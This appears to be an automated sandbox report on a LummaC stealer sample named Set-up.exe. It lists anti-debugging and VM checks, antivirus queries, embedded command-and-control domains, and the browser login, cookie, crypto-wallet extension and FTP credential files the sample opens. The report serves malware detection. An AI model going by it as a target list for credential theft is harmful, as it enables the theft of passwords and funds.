          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E8C970 CreateToolhelp32Snapshot,GetCurrentProcessId,Process32FirstW,PathIsPrefixW,Process32NextW,PathIsPrefixW,GetLastError,__CxxThrowException@8,0_2_00E8C970
          Source: C:\Users\user\Desktop\Set-up.exeAPI coverage: 5.1 %
          Source: C:\Users\user\Desktop\Set-up.exe TID: 6448Thread sleep time: -150000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exe TID: 6636Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: Set-up.exeBinary or memory string: hGfsd
          Source: Set-up.exe, 00000000.00000003.2072008223.0000000003B23000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2073967140.0000000003B23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW ;
          Source: Set-up.exeBinary or memory string: BNtQueryObject()\Device\Mup\\Device\VBoxMiniRdr\ :\Device\LanmanRedirector\\Device\WebDavRedirector\GetFinalPathNameByHandle().tmp\\?\ :\\?\GLOBALROOTNtSetInformationFile(FileRenameInformation)SetFileInformationByHandle(FileDispositionInfo)SetFileInformationByHandle(FileRenameInfo)NtSetInformationFile(FileDispositionInformation)QtBytes: data is outside of the specified objectQtVect[Quantum]QtOutPort[Quantum]QtOutPort[QtBytes]QtBytesQuantumQtVect[QtBytes]QtBytes, in QtBytes::Encode()QtVectS[QtBytes] bytes
          Source: Set-up.exe, 00000000.00000002.2073921655.0000000003AD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
          Source: Set-up.exe, 00000000.00000003.2072008223.0000000003B23000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2073967140.0000000003B23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: Set-up.exe, 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: NtQueryObject()\Device\Mup\\Device\VBoxMiniRdr\ :\Device\LanmanRedirector\\Device\WebDavRedirector\GetFinalPathNameByHandle().tmp\\?\ :\\?\GLOBALROOTNtSetInformationFile(FileRenameInformation)SetFileInformationByHandle(FileDispositionInfo)SetFileInformationByHandle(FileRenameInfo)NtSetInformationFile(FileDispositionInformation)QtBytes: data is outside of the specified objectQtVect[Quantum]QtOutPort[Quantum]QtOutPort[QtBytes]QtBytesQuantumQtVect[QtBytes]QtBytes, in QtBytes::Encode()QtVectS[QtBytes] bytes
          Source: C:\Users\user\Desktop\Set-up.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0591CE20 LdrInitializeThunk,0_2_0591CE20
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0111911A IsDebuggerPresent,OutputDebugStringW,0_2_0111911A
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E8C970 CreateToolhelp32Snapshot,GetCurrentProcessId,Process32FirstW,PathIsPrefixW,Process32NextW,PathIsPrefixW,GetLastError,__CxxThrowException@8,0_2_00E8C970
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E323B0 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,GetLastError,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,LoadLibraryW,GetProcAddress,GetProcAddress,VerSetConditionMask,VerSetConditionMask,GetLastError,FreeLibrary,SetLastError,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,0_2_00E323B0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01124C83 mov eax, dword ptr fs:[00000030h]0_2_01124C83
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054703FB mov edx, dword ptr fs:[00000030h]0_2_054703FB
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054709BB mov eax, dword ptr fs:[00000030h]0_2_054709BB
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0547100B mov eax, dword ptr fs:[00000030h]0_2_0547100B
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0547100A mov eax, dword ptr fs:[00000030h]0_2_0547100A
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05470D6B mov eax, dword ptr fs:[00000030h]0_2_05470D6B
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0111995A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0111995A
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01122F75 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_01122F75

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Contains functionality to prevent local Windows debugging
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E44630 IsDebuggerPresent,DebugBreak,GetModuleFileNameA,Concurrency::cancel_current_task,GetCurrentProcessId,GetCurrentThreadId,__CxxThrowException@8,__CxxThrowException@8,___std_exception_copy,0_2_00E44630
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E44BE0 IsDebuggerPresent,DebugBreak,ExitProcess,0_2_00E44BE0
          LummaC encrypted strings found
          Source: Set-up.exeString found in binary or memory: conceszustyb.shop
          Source: Set-up.exeString found in binary or memory: nightybinybz.shop
          Source: Set-up.exeString found in binary or memory: respectabosiz.shop
          Source: Set-up.exeString found in binary or memory: bakedstusteeb.shop
          Source: Set-up.exeString found in binary or memory: worddosofrm.shop
          Source: Set-up.exeString found in binary or memory: corehairydu.icu
          Source: Set-up.exeString found in binary or memory: standartedby.shop
          Source: Set-up.exeString found in binary or memory: mutterissuen.shop
          Source: Set-up.exeString found in binary or memory: moutheventushz.shop
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E5A820 SetSecurityDescriptorDacl,GetLastError,__CxxThrowException@8,0_2_00E5A820
          Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0112A159 GetSystemTimeAsFileTime,0_2_0112A159
          Source: C:\Users\user\Desktop\Set-up.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: Set-up.exe, 00000000.00000003.2071984278.0000000003BC7000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1977212265.0000000003BC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %\Windows Defender\MsMpeng.exe
          Source: Set-up.exe, 00000000.00000003.1960858747.0000000003BC7000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2074136163.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1977297210.0000000003B88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2072348200.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2072008223.0000000003B89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\Set-up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Yara detected LummaC Stealer
          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 6544, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Found many strings related to Crypto-Wallets (likely being stolen)
          Source: Set-up.exe, 00000000.00000003.2072008223.0000000003B23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
          Source: Set-up.exe, 00000000.00000003.2072008223.0000000003B23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
          Source: Set-up.exe, 00000000.00000003.1946139098.0000000003B8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
          Source: Set-up.exe, 00000000.00000003.2072008223.0000000003B23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
          Source: Set-up.exe, 00000000.00000003.1946139098.0000000003B8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
          Source: Set-up.exe, 00000000.00000003.2072008223.0000000003B23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
          Source: Set-up.exe, 00000000.00000003.1946139098.0000000003B8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
          Source: Set-up.exe, 00000000.00000003.1946139098.0000000003B8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
          Tries to harvest and steal ftp login credentials
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
